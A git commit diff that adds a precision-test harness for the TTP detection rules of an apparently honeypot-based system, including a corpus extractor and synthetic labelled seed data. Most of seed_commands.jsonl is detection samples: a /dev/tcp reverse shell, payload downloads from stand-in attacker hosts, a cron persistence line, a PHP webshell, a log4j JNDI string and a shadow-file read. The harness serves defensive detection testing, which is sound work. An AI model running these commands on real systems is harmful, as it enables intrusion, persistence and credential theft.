feat(ttp): E.3.8 corpus + harness — labelled holdout fixture
Sub-step preceding the rule-pack commits per TTP_TAGGING.md:2967. Adds the per-rule precision suite scaffolding under tests/ttp/rule_precision/: - conftest.py: precision_engine fixture (RuleEngine populated from ./rules/ttp/), corpus_loader (real → seed → empty fallback), precision_for() helper for TP/FP accounting. - _build_corpus.py: extractor for a real prod corpus pull. Mandatory --exclude-ip / DECNET_TTP_CORPUS_EXCLUDE_IPS — operator IPs never end up in the committed exclusion list. Pulls both 'command' and 'unknown_command' event types. - corpus/seed_*.jsonl: synthetic seed rows for each cohort so the harness exercises in clean checkouts. - corpus/*.jsonl (operator-built) is gitignored. - test_corpus_loads.py: sentinel that every seed file parses.
This commit is contained in:
6
.gitignore
vendored
6
.gitignore
vendored
@@ -57,3 +57,9 @@ deps.txt
|
|||||||
# build/deploy time.
|
# build/deploy time.
|
||||||
node_modules/
|
node_modules/
|
||||||
package-lock.json
|
package-lock.json
|
||||||
|
|
||||||
|
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||||
|
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||||
|
# files alongside ARE committed and exercise the harness in CI.
|
||||||
|
tests/ttp/rule_precision/corpus/*.jsonl
|
||||||
|
!tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||||
|
|||||||
12
tests/ttp/rule_precision/__init__.py
Normal file
12
tests/ttp/rule_precision/__init__.py
Normal file
@@ -0,0 +1,12 @@
|
|||||||
|
"""Per-rule precision suite for TTP rule pack v0.
|
||||||
|
|
||||||
|
One test module per rule cohort (command / behavioral / email / canary /
|
||||||
|
intel) drives the labelled holdout corpus through a real
|
||||||
|
:class:`RuleEngine` bound to ``./rules/ttp/`` and asserts the
|
||||||
|
Appendix-C precision target.
|
||||||
|
|
||||||
|
Live cohort: command (R0001-R0030). Other cohorts ship YAMLs whose
|
||||||
|
match specs target downstream lifters (E.3.9-E.3.12); their
|
||||||
|
precision tests are :pyfunc:`pytest.xfail`-gated until the lifter
|
||||||
|
lands, matching the CDD pattern from ``development/TTP_TAGGING.md``.
|
||||||
|
"""
|
||||||
121
tests/ttp/rule_precision/_build_corpus.py
Normal file
121
tests/ttp/rule_precision/_build_corpus.py
Normal file
@@ -0,0 +1,121 @@
|
|||||||
|
"""Extract a labelled corpus from the production sqlite DB.
|
||||||
|
|
||||||
|
Run on the operator workstation against a real ``decnet-prod.db``.
|
||||||
|
Outputs ``corpus/commands.jsonl`` (gitignored).
|
||||||
|
|
||||||
|
**IP exclusion is mandatory and operator-supplied.** The operator's
|
||||||
|
own source IP, plus any other addresses that must never end up in a
|
||||||
|
committed/inspected corpus, are passed via ``--exclude-ip`` (repeatable)
|
||||||
|
or the ``DECNET_TTP_CORPUS_EXCLUDE_IPS`` env var (comma-separated).
|
||||||
|
The script refuses to run with an empty exclusion list — extracting
|
||||||
|
attacker payloads without a vetted blocklist is a doxxing footgun and
|
||||||
|
that mistake is not allowed to happen silently.
|
||||||
|
|
||||||
|
Usage::
|
||||||
|
|
||||||
|
DECNET_TTP_CORPUS_EXCLUDE_IPS="<your-ip>,<other>" \\
|
||||||
|
python -m tests.ttp.rule_precision._build_corpus \\
|
||||||
|
--db /path/to/decnet-prod.db \\
|
||||||
|
--out tests/ttp/rule_precision/corpus
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import argparse
|
||||||
|
import json
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
import sqlite3
|
||||||
|
import sys
|
||||||
|
from collections.abc import Iterable
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any
|
||||||
|
|
||||||
|
_CMD_RE = re.compile(r"\bcmd=(.*)$")
|
||||||
|
_ENV_VAR = "DECNET_TTP_CORPUS_EXCLUDE_IPS"
|
||||||
|
|
||||||
|
|
||||||
|
def _extract_cmd(raw_line: str) -> str | None:
|
||||||
|
match = _CMD_RE.search(raw_line)
|
||||||
|
if match is None:
|
||||||
|
return None
|
||||||
|
cmd = match.group(1).strip()
|
||||||
|
return cmd or None
|
||||||
|
|
||||||
|
|
||||||
|
def _scrub_ips(text: str, excludes: Iterable[str]) -> str:
|
||||||
|
out = text
|
||||||
|
for ip in excludes:
|
||||||
|
out = out.replace(ip, "0.0.0.0")
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_excludes(cli: list[str]) -> list[str]:
|
||||||
|
env = os.environ.get(_ENV_VAR, "")
|
||||||
|
env_parts = [chunk.strip() for chunk in env.split(",") if chunk.strip()]
|
||||||
|
merged = sorted({*cli, *env_parts})
|
||||||
|
return merged
|
||||||
|
|
||||||
|
|
||||||
|
def build_command_corpus(
|
||||||
|
db_path: Path,
|
||||||
|
out_path: Path,
|
||||||
|
excludes: list[str],
|
||||||
|
) -> int:
|
||||||
|
"""Write ``commands.jsonl`` from the prod DB. Returns row count."""
|
||||||
|
if not excludes:
|
||||||
|
raise RuntimeError(
|
||||||
|
"refusing to extract corpus with empty IP exclusion list — "
|
||||||
|
f"set --exclude-ip or {_ENV_VAR}",
|
||||||
|
)
|
||||||
|
placeholders = ",".join("?" * len(excludes))
|
||||||
|
sql = (
|
||||||
|
"SELECT raw_line FROM logs "
|
||||||
|
"WHERE event_type IN ('command', 'unknown_command') "
|
||||||
|
f"AND attacker_ip NOT IN ({placeholders})"
|
||||||
|
)
|
||||||
|
rows: list[dict[str, Any]] = []
|
||||||
|
seen: set[str] = set()
|
||||||
|
with sqlite3.connect(db_path) as con:
|
||||||
|
for (raw,) in con.execute(sql, excludes):
|
||||||
|
cmd = _extract_cmd(raw)
|
||||||
|
if cmd is None or cmd in seen:
|
||||||
|
continue
|
||||||
|
seen.add(cmd)
|
||||||
|
scrubbed = _scrub_ips(cmd, excludes)
|
||||||
|
rows.append({
|
||||||
|
"source_kind": "command",
|
||||||
|
"payload": {"command_text": scrubbed},
|
||||||
|
"expected_rule_ids": [],
|
||||||
|
"label": f"prod-{len(rows):04d}",
|
||||||
|
})
|
||||||
|
out_path.mkdir(parents=True, exist_ok=True)
|
||||||
|
target = out_path / "commands.jsonl"
|
||||||
|
with target.open("w", encoding="utf-8") as fh:
|
||||||
|
for row in rows:
|
||||||
|
fh.write(json.dumps(row, ensure_ascii=False) + "\n")
|
||||||
|
return len(rows)
|
||||||
|
|
||||||
|
|
||||||
|
def main(argv: list[str] | None = None) -> int:
|
||||||
|
parser = argparse.ArgumentParser(description=__doc__)
|
||||||
|
parser.add_argument("--db", type=Path, required=True)
|
||||||
|
parser.add_argument("--out", type=Path, required=True)
|
||||||
|
parser.add_argument(
|
||||||
|
"--exclude-ip",
|
||||||
|
action="append",
|
||||||
|
default=[],
|
||||||
|
help=(
|
||||||
|
"IP to drop from the SQL pull AND scrub from cmd payloads. "
|
||||||
|
f"Repeatable. Merged with ${_ENV_VAR}. At least one "
|
||||||
|
"exclusion is mandatory."
|
||||||
|
),
|
||||||
|
)
|
||||||
|
args = parser.parse_args(argv)
|
||||||
|
excludes = _resolve_excludes(args.exclude_ip)
|
||||||
|
n = build_command_corpus(args.db, args.out, excludes)
|
||||||
|
print(f"wrote {n} command rows to {args.out / 'commands.jsonl'}")
|
||||||
|
return 0
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__": # pragma: no cover
|
||||||
|
sys.exit(main())
|
||||||
220
tests/ttp/rule_precision/conftest.py
Normal file
220
tests/ttp/rule_precision/conftest.py
Normal file
@@ -0,0 +1,220 @@
|
|||||||
|
"""Fixtures for the per-rule precision suite.
|
||||||
|
|
||||||
|
Two halves:
|
||||||
|
|
||||||
|
* :func:`precision_engine` — async fixture that builds a real
|
||||||
|
:class:`RuleEngine` populated from ``./rules/ttp/`` via
|
||||||
|
:func:`_parse_and_compile`. We bypass ``RuleEngine.watch_store``
|
||||||
|
(which would loop forever on the inotify subscription) and instead
|
||||||
|
call ``_install`` directly per rule. The engine reads no rules
|
||||||
|
through any store ABC method, so a stub store passes for
|
||||||
|
construction.
|
||||||
|
* :func:`corpus_loader` — factory fixture returning labelled rows
|
||||||
|
for a cohort (``commands`` / ``email`` / ``intel`` / ``canary`` /
|
||||||
|
``behavioral``). Prefers ``corpus/<name>.jsonl`` (operator-built,
|
||||||
|
gitignored) and falls back to ``corpus/seed_<name>.jsonl``
|
||||||
|
(synthetic, committed). If neither exists the fixture returns ``[]``
|
||||||
|
and the precision tests :func:`pytest.skip` themselves — letting a
|
||||||
|
fresh checkout exercise the harness without a corpus.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import json
|
||||||
|
from collections.abc import Callable
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, NamedTuple
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
import pytest_asyncio
|
||||||
|
|
||||||
|
from decnet.ttp.base import TaggerEvent
|
||||||
|
from decnet.ttp.impl.rule_engine import CompiledRule, RuleEngine
|
||||||
|
from decnet.ttp.store.base import RuleState
|
||||||
|
from decnet.ttp.store.impl.filesystem import _parse_and_compile
|
||||||
|
|
||||||
|
_RULES_DIR = Path(__file__).resolve().parents[2] / "rules" / "ttp"
|
||||||
|
_CORPUS_DIR = Path(__file__).resolve().parent / "corpus"
|
||||||
|
|
||||||
|
|
||||||
|
class CorpusRow(NamedTuple):
|
||||||
|
"""One labelled corpus row.
|
||||||
|
|
||||||
|
``payload`` carries the keys the engine's match operator reads —
|
||||||
|
``command_text`` for ``command``, ``raw_url`` for ``http_request``,
|
||||||
|
etc. ``expected_rule_ids`` is the human-labelled ground truth: the
|
||||||
|
rules a competent analyst would expect to fire on this row.
|
||||||
|
Negative examples (``[]``) are load-bearing for precision: they
|
||||||
|
catch FPs by giving non-matching payloads in the "matches" pool.
|
||||||
|
"""
|
||||||
|
|
||||||
|
source_kind: str
|
||||||
|
payload: dict[str, Any]
|
||||||
|
expected_rule_ids: tuple[str, ...]
|
||||||
|
label: str
|
||||||
|
|
||||||
|
|
||||||
|
class _StubStore:
|
||||||
|
"""Just enough of :class:`RuleStore` to satisfy ``RuleEngine.__init__``.
|
||||||
|
|
||||||
|
The fixture installs rules directly into the engine's dispatch
|
||||||
|
index; no store method is actually called during precision tests.
|
||||||
|
"""
|
||||||
|
|
||||||
|
async def load_compiled(self) -> list[CompiledRule]:
|
||||||
|
return []
|
||||||
|
|
||||||
|
async def get_state(self, _rule_id: str) -> RuleState:
|
||||||
|
return RuleState()
|
||||||
|
|
||||||
|
async def set_state(self, *_a: Any, **_kw: Any) -> None:
|
||||||
|
return None
|
||||||
|
|
||||||
|
def subscribe_changes(self) -> Any:
|
||||||
|
async def _gen() -> Any:
|
||||||
|
if False: # pragma: no cover
|
||||||
|
yield None
|
||||||
|
return _gen()
|
||||||
|
|
||||||
|
|
||||||
|
def _load_compiled_rules() -> list[CompiledRule]:
|
||||||
|
"""Compile every YAML under ``./rules/ttp/`` once per session.
|
||||||
|
|
||||||
|
Ignores files that fail to parse — the cohort tests assert presence
|
||||||
|
of their rule_id, so a bad YAML surfaces as a missing-rule failure
|
||||||
|
rather than a confusing ImportError out of the fixture.
|
||||||
|
"""
|
||||||
|
if not _RULES_DIR.exists():
|
||||||
|
return []
|
||||||
|
out: list[CompiledRule] = []
|
||||||
|
state = RuleState()
|
||||||
|
for path in sorted(_RULES_DIR.iterdir()):
|
||||||
|
if path.suffix not in {".yaml", ".yml"}:
|
||||||
|
continue
|
||||||
|
try:
|
||||||
|
out.append(_parse_and_compile(path, state))
|
||||||
|
except Exception: # noqa: BLE001 — broken YAML is its own failure surface
|
||||||
|
continue
|
||||||
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="session")
|
||||||
|
def compiled_rules() -> list[CompiledRule]:
|
||||||
|
return _load_compiled_rules()
|
||||||
|
|
||||||
|
|
||||||
|
@pytest_asyncio.fixture
|
||||||
|
async def precision_engine(
|
||||||
|
compiled_rules: list[CompiledRule],
|
||||||
|
) -> RuleEngine:
|
||||||
|
"""A :class:`RuleEngine` with every YAML rule installed.
|
||||||
|
|
||||||
|
Bypasses ``watch_store()`` (it loops forever on the inotify
|
||||||
|
subscription). The engine's public ``evaluate()`` reads only
|
||||||
|
``self._by_kind`` / ``self._by_rule``, both populated here.
|
||||||
|
"""
|
||||||
|
engine = RuleEngine(_StubStore()) # type: ignore[arg-type]
|
||||||
|
for rule in compiled_rules:
|
||||||
|
engine._install(rule)
|
||||||
|
return engine
|
||||||
|
|
||||||
|
|
||||||
|
def _read_jsonl(path: Path) -> list[dict[str, Any]]:
|
||||||
|
rows: list[dict[str, Any]] = []
|
||||||
|
with path.open("r", encoding="utf-8") as handle:
|
||||||
|
for line in handle:
|
||||||
|
stripped = line.strip()
|
||||||
|
if not stripped or stripped.startswith("#"):
|
||||||
|
continue
|
||||||
|
rows.append(json.loads(stripped))
|
||||||
|
return rows
|
||||||
|
|
||||||
|
|
||||||
|
def _resolve_corpus_path(name: str) -> Path | None:
|
||||||
|
real = _CORPUS_DIR / f"{name}.jsonl"
|
||||||
|
if real.exists():
|
||||||
|
return real
|
||||||
|
seed = _CORPUS_DIR / f"seed_{name}.jsonl"
|
||||||
|
if seed.exists():
|
||||||
|
return seed
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
def _row_from_dict(raw: dict[str, Any]) -> CorpusRow:
|
||||||
|
return CorpusRow(
|
||||||
|
source_kind=str(raw.get("source_kind", "command")),
|
||||||
|
payload=dict(raw.get("payload", {})),
|
||||||
|
expected_rule_ids=tuple(raw.get("expected_rule_ids", [])),
|
||||||
|
label=str(raw.get("label", "")),
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.fixture(scope="session")
|
||||||
|
def corpus_loader() -> Callable[[str], list[CorpusRow]]:
|
||||||
|
"""Return a callable that loads a cohort's labelled corpus.
|
||||||
|
|
||||||
|
Resolution order: ``corpus/<name>.jsonl`` (real, gitignored) →
|
||||||
|
``corpus/seed_<name>.jsonl`` (synthetic, committed) → empty list
|
||||||
|
(caller's tests skip).
|
||||||
|
"""
|
||||||
|
|
||||||
|
def _load(name: str) -> list[CorpusRow]:
|
||||||
|
path = _resolve_corpus_path(name)
|
||||||
|
if path is None:
|
||||||
|
return []
|
||||||
|
return [_row_from_dict(row) for row in _read_jsonl(path)]
|
||||||
|
|
||||||
|
return _load
|
||||||
|
|
||||||
|
|
||||||
|
def make_event(row: CorpusRow, source_id: str = "src") -> TaggerEvent:
|
||||||
|
"""Materialise a :class:`CorpusRow` into a :class:`TaggerEvent`."""
|
||||||
|
return TaggerEvent(
|
||||||
|
source_kind=row.source_kind,
|
||||||
|
source_id=source_id,
|
||||||
|
attacker_uuid=None,
|
||||||
|
identity_uuid=None,
|
||||||
|
session_id=None,
|
||||||
|
decky_id=None,
|
||||||
|
payload=row.payload,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
def precision_for(
|
||||||
|
rule_id: str,
|
||||||
|
rows: list[CorpusRow],
|
||||||
|
fired: dict[str, list[str]],
|
||||||
|
) -> tuple[float, int, int]:
|
||||||
|
"""Compute precision = TP / (TP + FP) for *rule_id*.
|
||||||
|
|
||||||
|
``fired[label] = [rule_ids that matched this row]``. A row whose
|
||||||
|
``expected_rule_ids`` includes *rule_id* and whose match set
|
||||||
|
includes *rule_id* is a TP. A row that fired *rule_id* but did
|
||||||
|
NOT expect it is a FP.
|
||||||
|
|
||||||
|
Returns ``(precision, tp, fp)``. Precision is ``1.0`` when no
|
||||||
|
matches fired (vacuously) — callers gate that case with the
|
||||||
|
``min_matches`` check before asserting.
|
||||||
|
"""
|
||||||
|
tp = 0
|
||||||
|
fp = 0
|
||||||
|
for row in rows:
|
||||||
|
matched = rule_id in fired.get(row.label, [])
|
||||||
|
expected = rule_id in row.expected_rule_ids
|
||||||
|
if matched and expected:
|
||||||
|
tp += 1
|
||||||
|
elif matched and not expected:
|
||||||
|
fp += 1
|
||||||
|
total = tp + fp
|
||||||
|
if total == 0:
|
||||||
|
return 1.0, 0, 0
|
||||||
|
return tp / total, tp, fp
|
||||||
|
|
||||||
|
|
||||||
|
__all__ = [
|
||||||
|
"CorpusRow",
|
||||||
|
"compiled_rules",
|
||||||
|
"precision_engine",
|
||||||
|
"corpus_loader",
|
||||||
|
"make_event",
|
||||||
|
"precision_for",
|
||||||
|
]
|
||||||
2
tests/ttp/rule_precision/corpus/seed_behavioral.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_behavioral.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "session", "payload": {"beacon_interval_s": 60, "beacon_jitter_pct": 0.05}, "expected_rule_ids": ["R0031"], "label": "low_jitter_beacon"}
|
||||||
|
{"source_kind": "session", "payload": {"beacon_interval_s": 0, "beacon_jitter_pct": 0}, "expected_rule_ids": [], "label": "negative_no_beacon"}
|
||||||
2
tests/ttp/rule_precision/corpus/seed_canary.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_canary.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "canary_fingerprint", "payload": {"ua_signature": "HeadlessChrome/119", "navigator_webdriver": true}, "expected_rule_ids": ["R0049"], "label": "webdriver_flag"}
|
||||||
|
{"source_kind": "canary_fingerprint", "payload": {"ua_signature": "Mozilla/5.0", "navigator_webdriver": false}, "expected_rule_ids": [], "label": "negative_browser"}
|
||||||
41
tests/ttp/rule_precision/corpus/seed_commands.jsonl
Normal file
41
tests/ttp/rule_precision/corpus/seed_commands.jsonl
Normal file
@@ -0,0 +1,41 @@
|
|||||||
|
{"source_kind": "command", "payload": {"command_text": "hydra -L users.txt -P pass.txt ssh://10.0.0.1"}, "expected_rule_ids": ["R0001"], "label": "hydra_ssh_brute"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "medusa -h 10.0.0.1 -u root -P passlist -M ssh"}, "expected_rule_ids": ["R0001"], "label": "medusa_ssh_brute"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ncrack -p 22 --user root -P rockyou.txt 10.0.0.1"}, "expected_rule_ids": ["R0001"], "label": "ncrack_ssh"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sqlmap -u http://victim/x?id=1 --dbs"}, "expected_rule_ids": ["R0007"], "label": "sqlmap_invocation"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl -H 'X-Api-Version: ${jndi:ldap://x.evil/a}' http://target"}, "expected_rule_ids": ["R0008", "R0012"], "label": "log4j_jndi_curl"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl http://target/page?file=../../../../etc/passwd"}, "expected_rule_ids": ["R0009", "R0013", "R0012"], "label": "path_traversal_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "/bin/sh -c 'id'"}, "expected_rule_ids": ["R0010", "R0011", "R0019"], "label": "sh_dash_c_id"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"}, "expected_rule_ids": ["R0010", "R0011"], "label": "bash_revshell_devtcp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "python3 -c 'import os; os.system(\"id\")'"}, "expected_rule_ids": ["R0011"], "label": "python_oneliner"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "wget http://attacker/payload.sh -O /tmp/p.sh"}, "expected_rule_ids": ["R0012"], "label": "wget_http_payload"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "curl -O http://attacker/loader.bin"}, "expected_rule_ids": ["R0012"], "label": "curl_http_loader"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cat /etc/passwd"}, "expected_rule_ids": ["R0013"], "label": "cat_etc_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "less /etc/passwd"}, "expected_rule_ids": ["R0013"], "label": "less_etc_passwd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cat /etc/shadow"}, "expected_rule_ids": ["R0014"], "label": "cat_etc_shadow"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -perm -u=s -type f 2>/dev/null"}, "expected_rule_ids": ["R0015", "R0016"], "label": "find_suid"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -perm -4000"}, "expected_rule_ids": ["R0015", "R0016"], "label": "find_perm_4000"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "find / -name '*.conf'"}, "expected_rule_ids": ["R0016"], "label": "find_recursive_no_suid"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "nmap -sS -p 1-65535 10.0.0.0/24"}, "expected_rule_ids": ["R0017"], "label": "nmap_scan"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "masscan 10.0.0.0/8 -p443"}, "expected_rule_ids": ["R0017"], "label": "masscan"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "uname -a"}, "expected_rule_ids": ["R0018"], "label": "uname_a"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "lsb_release -a"}, "expected_rule_ids": ["R0018"], "label": "lsb_release"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "id"}, "expected_rule_ids": ["R0019"], "label": "id_alone"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "whoami"}, "expected_rule_ids": ["R0019"], "label": "whoami"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ip addr"}, "expected_rule_ids": ["R0020"], "label": "ip_addr"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ifconfig -a"}, "expected_rule_ids": ["R0020"], "label": "ifconfig"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "netstat -an"}, "expected_rule_ids": ["R0021"], "label": "netstat_an"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ss -tnp"}, "expected_rule_ids": ["R0021"], "label": "ss_tnp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ldapsearch -x -b dc=example,dc=com '(objectClass=user)'"}, "expected_rule_ids": ["R0022"], "label": "ldapsearch"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "smbclient -L //10.0.0.1"}, "expected_rule_ids": ["R0023"], "label": "smbclient_list"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "useradd -m -s /bin/bash backdoor"}, "expected_rule_ids": ["R0024"], "label": "useradd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo '* * * * * curl http://x/a' >> /var/spool/cron/root"}, "expected_rule_ids": ["R0025", "R0012"], "label": "cron_persist"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "redis-cli -h 10.0.0.5 config set dir /root/.ssh"}, "expected_rule_ids": ["R0026"], "label": "redis_ssh_dir"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo '<?php system($_GET[\"c\"]); ?>' > /var/www/html/x.php"}, "expected_rule_ids": ["R0027"], "label": "webshell_php"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "history -c"}, "expected_rule_ids": ["R0028"], "label": "history_clear"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "unset HISTFILE"}, "expected_rule_ids": ["R0028"], "label": "unset_histfile"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sudo -l"}, "expected_rule_ids": ["R0029"], "label": "sudo_l"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "sudo su -"}, "expected_rule_ids": ["R0029"], "label": "sudo_su"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ls /tmp"}, "expected_rule_ids": [], "label": "negative_ls_tmp"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "echo hello"}, "expected_rule_ids": [], "label": "negative_echo"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "cd /var/log"}, "expected_rule_ids": [], "label": "negative_cd"}
|
||||||
|
{"source_kind": "command", "payload": {"command_text": "ps aux"}, "expected_rule_ids": [], "label": "negative_ps_aux"}
|
||||||
3
tests/ttp/rule_precision/corpus/seed_email.jsonl
Normal file
3
tests/ttp/rule_precision/corpus/seed_email.jsonl
Normal file
@@ -0,0 +1,3 @@
|
|||||||
|
{"source_kind": "email", "payload": {"subject": "Urgent wire transfer needed", "from": "ceo@victim.example", "return_path": "evil@bad.example", "rcpt_count": 1, "body": "Please send $50k to the attached account immediately."}, "expected_rule_ids": ["R0047"], "label": "bec_wire"}
|
||||||
|
{"source_kind": "email", "payload": {"subject": "Newsletter", "from": "marketing@legit.example", "rcpt_count": 1, "body": "Hello world."}, "expected_rule_ids": [], "label": "negative_newsletter"}
|
||||||
|
{"source_kind": "email", "payload": {"subject": "Win a prize", "from": "promo@evil.example", "rcpt_count": 250, "body": "Click here http://evil.example/win"}, "expected_rule_ids": ["R0042"], "label": "mass_phish"}
|
||||||
2
tests/ttp/rule_precision/corpus/seed_intel.jsonl
Normal file
2
tests/ttp/rule_precision/corpus/seed_intel.jsonl
Normal file
@@ -0,0 +1,2 @@
|
|||||||
|
{"source_kind": "intel", "payload": {"verdict": "malicious", "provider": "abuseipdb", "categories": [18, 22]}, "expected_rule_ids": ["R0054"], "label": "abuseipdb_brute"}
|
||||||
|
{"source_kind": "intel", "payload": {"verdict": "benign", "provider": "greynoise", "tags": []}, "expected_rule_ids": [], "label": "negative_benign"}
|
||||||
33
tests/ttp/rule_precision/test_corpus_loads.py
Normal file
33
tests/ttp/rule_precision/test_corpus_loads.py
Normal file
@@ -0,0 +1,33 @@
|
|||||||
|
"""Sentinel: every cohort's seed corpus parses and the harness lives.
|
||||||
|
|
||||||
|
Runs in clean checkouts (no operator-built corpus). Asserts the seed
|
||||||
|
JSONL files load through :func:`corpus_loader` without raising and
|
||||||
|
yield non-empty lists. Doesn't run any rules — that's the per-cohort
|
||||||
|
suites' job. This sentinel exists so a busted corpus file fails the
|
||||||
|
suite immediately, not three commits later when the first cohort
|
||||||
|
test finally tries to load it.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from collections.abc import Callable
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
|
||||||
|
from tests.ttp.rule_precision.conftest import CorpusRow
|
||||||
|
|
||||||
|
CohortLoader = Callable[[str], list[CorpusRow]]
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
"name",
|
||||||
|
["commands", "email", "intel", "canary", "behavioral"],
|
||||||
|
)
|
||||||
|
def test_seed_corpus_loads(
|
||||||
|
corpus_loader: CohortLoader, name: str,
|
||||||
|
) -> None:
|
||||||
|
rows = corpus_loader(name)
|
||||||
|
assert rows, f"seed_{name}.jsonl returned no rows"
|
||||||
|
for row in rows:
|
||||||
|
assert row.source_kind, f"row {row.label} missing source_kind"
|
||||||
|
assert isinstance(row.payload, dict)
|
||||||
|
assert isinstance(row.expected_rule_ids, tuple)
|
||||||
Reference in New Issue
Block a user